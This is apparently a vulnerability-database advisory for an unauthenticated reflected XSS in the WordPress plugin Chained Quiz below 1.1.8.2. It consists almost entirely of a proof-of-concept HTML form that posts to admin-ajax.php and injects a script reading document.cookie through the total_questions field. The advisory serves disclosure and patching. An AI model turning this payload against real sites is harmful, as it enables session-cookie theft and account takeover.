Chained Quiz < 1.1.8.2 - Unauthenticated Reflected XSS

2020-01-16T00:00:00
ID WPEX-ID:10029
Type wpexploit
Reporter Ben Armstrong
Modified 2020-09-22T00:00:00

Description

WordPress Vulnerability - Chained Quiz < 1.1.8.2 - Unauthenticated Reflected XSS

                                        
                                            &lt;html&gt;
  &lt;body&gt;
  &lt;script&gt;history.pushState('', '', '/')&lt;/script&gt;
    &lt;form action="http://localhost/wp-admin/admin-ajax.php" method="POST"&gt;
      &lt;input type="hidden" name="answer" value="x&#32;" /&gt;
      &lt;input type="hidden" name="question&#95;id" value="1" /&gt;
      &lt;input type="hidden" name="quiz&#95;id" value="1" /&gt;
      &lt;input type="hidden" name="post&#95;id"a value="5" /&gt;
      &lt;input type="hidden" name="question&#95;type" value="radio" /&gt;
      &lt;input type="hidden" name="points" value="0" /&gt;
      &lt;input type="hidden" name="action" value="chainedquiz&#95;ajax" /&gt;
      &lt;input type="hidden" name="chainedquiz&#95;action" value="answer" /&gt;
      &lt;input type="hidden" name="total&#95;questions" value="1v4918&lt;script&gt;alert&#40;document&#46;cookie&#41;&lt;&#47;script&gt;eyjfw" /&gt;
      &lt;input type="submit" value="Submit request" /&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;